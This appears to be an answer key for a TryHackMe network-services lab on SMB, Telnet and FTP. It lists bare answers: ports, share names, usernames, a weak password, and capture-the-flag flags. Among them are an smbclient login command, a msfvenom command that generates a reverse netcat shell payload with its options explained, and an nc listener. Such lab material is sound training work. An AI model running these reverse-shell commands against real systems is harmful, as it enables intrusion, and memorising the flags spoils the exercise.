Network Services

Server Message Block

response-request

TCP/IP

Unix

3

139/445

WORKGROUP

POLOSMB

6.1

profiles

smbclient //10.10.10.2/secret -U suit -p 445

Y

John Cactus

ssh

.ssh

id_rsa

THM{smb_is_fun_eh?}

application protocol

ssh

telnet 10.10.10.3 23

encryption

1

8012

tcp

0

a backdoor

Skidy

SKIDY'S BACKDOOR.

N

Y

"msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R"


-p = payload

lhost = our local host IP address (this is your machine's IP address)

lport = the port to listen on (this is the port on your machine)

R = export the payload in raw format


What word does the generated payload start with?

mkfifo

nc -lvp 4444

THM{y0u_g0t_th3_t3ln3t_fl4g}

client-server

21

2

2

21

PUBLIC_NOTICE.txt

mike

password

THM{y0u_g0t_th3_ftp_fl4g}